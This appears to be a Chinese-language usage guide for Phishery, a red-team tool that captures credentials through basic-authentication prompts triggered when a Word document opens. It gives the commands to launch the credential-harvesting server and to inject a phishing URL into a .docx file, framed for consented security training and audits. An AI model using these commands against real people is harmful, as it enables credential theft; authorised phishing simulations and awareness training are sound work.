Phishery 指南:钓鱼工具与安全测试实践
1. 项目介绍
Phishery 是一个基于 Go 语言开发的简单 SSL 启用 HTTP 服务器,主要用于进行基本身份验证钓鱼(phishing)以捕获目标的凭证。它允许注入 URL 到 .docx Word 文档中,当用户打开这些文档时,Microsoft Word 将自动向伪造的 web 服务器发送请求,显示认证对话框,诱使用户提供敏感信息。
GitHub 仓库:https://github.com/ryhanson/phishery
2. 项目快速启动
安装 Phishery
首先,确保你的环境中已安装了 Go。然后,通过 go get
获取 Phishery:
go get github.com/ryhanson/phishery
或者,你可以从项目发布页面下载预编译的二进制文件并解压到你的 PATH 路径:
wget https://github.com/ryhanson/phishery/releases/download/v1.0.2/phishery1.0.2windows-amd64.tar.gz
tar -xzvf phishery1.0.2windows-amd64.tar.gz
cp phishery /usr/local/bin
启动 Phishery 服务
phishery -l ":8080" -c "mycert.pem" -k "mykey.pem"
参数解释:
-l
:监听的本地端口。-c
:SSL 证书文件路径。-k
:SSL 私钥文件路径。
创建钓鱼 .docx 文件
phishery -u "https://your-phishing-site.example.com/" -i "good.docx" -o "bad.docx"
参数解释:
-u
:要注入到 Word 文档中的 URL。-i
:原始 .docx 文件路径。-o
:注入 URL 后的新 .docx 文件路径。
3. 应用案例和最佳实践
- 模拟攻击场景:用于网络安全培训,教育用户识别钓鱼邮件和网站。
- 安全审计:在受控环境中测试员工对基本认证钓鱼的抵抗力。
- 安全意识提升:创建模拟钓鱼文档,发送给团队成员,让他们体验并了解钓鱼风险。
最佳实践:
- 在合法的测试环境中运行 Phishery。
- 仅对知情同意的目标进行测试,遵循所有适用法律和法规。
- 总是提供测试结果反馈,帮助提高安全意识。
4. 典型生态项目
- OpenSSL:用于生成 SSL 证书和私钥。
- Microsoft Office 或类似软件:用于处理 .docx 文件。
- Word-to-PDF 工具:将含有注入 URL 的文档转换为 PDF,扩大覆盖范围。
- Burp Suite 或 ZAP (Zed Attack Proxy):用于监控网络流量和验证钓鱼效果。
本指南旨在提供 Phishery 的基本操作,更多高级用法和自定义配置可参考项目官方文档或源码。